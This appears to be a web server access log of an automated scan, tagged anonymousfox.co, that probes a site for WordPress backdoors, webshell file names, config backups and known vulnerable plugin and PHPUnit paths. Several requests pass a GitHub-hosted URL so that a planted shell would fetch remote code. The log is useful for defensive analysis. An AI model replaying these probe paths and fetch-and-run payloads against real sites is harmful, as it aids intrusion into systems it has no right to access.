-	17:58:41	-0600	GET /style.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	17:58:51	-0600	GET /moduless.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	17:59:01	-0600	GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	17:59:12	-0600	GET /admin.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	17:59:26	-0600	GET /index.php?3x=3x HTTP/1.1	403	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	17:59:36	-0600	GET /boom.php?x HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	17:59:48	-0600	GET /wp-content/plugins/backup_index.php HTTP/1.1	404	7172	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:00:04	-0600	GET /wp-content/db_cache.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:00:10	-0600	GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:00:23	-0600	GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:00:34	-0600	GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:00:43	-0600	GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:00:53	-0600	GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:01:03	-0600	GET /alfindex.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:01:13	-0600	GET /alfa.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:01:23	-0600	GET /wp-booking.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:01:33	-0600	GET /cindex.php HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:01:44	-0600	GET /wp-content/wp-1ogin_bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:01:58	-0600	GET /wp-1ogin_bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:02:11	-0600	GET /wp-includes/fonts/css.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:02:23	-0600	GET /wp-includes/css/css.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:02:37	-0600	GET /old-index.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:02:48	-0600	GET /config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:02:57	-0600	GET /wp-admin/config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:03:07	-0600	GET /wp-content/config.bak.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:03:16	-0600	GET /wp-includes/config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:03:25	-0600	GET /wp-content/themes/config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:03:34	-0600	GET /wp-content/plugins/config.bak.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:03:46	-0600	POST /wp-includes/css/wp-config.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:03:55	-0600	GET /wp-content/plugins/ubh/up.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:04:04	-0600	GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1	404	7173	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:04:16	-0600	GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:04:27	-0600	GET /haders.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:04:35	-0600	GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:04:44	-0600	GET /legion.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:04:53	-0600	GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:05:04	-0600	GET /wp-includes/lfx.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:05:13	-0600	GET /wp-includes/small.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:05:20	-0600	GET /up.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:05:30	-0600	GET /upload.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:05:39	-0600	GET /config.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:05:47	-0600	GET /test.php?Ghost=send HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:05:58	-0600	GET /wp-content/langar.php HTTP/1.1	404	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:06:10	-0600	GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:06:20	-0600	GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1	404	7175	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
-	18:06:32	-0600	GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1	403	7174	anonymousfox.co	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
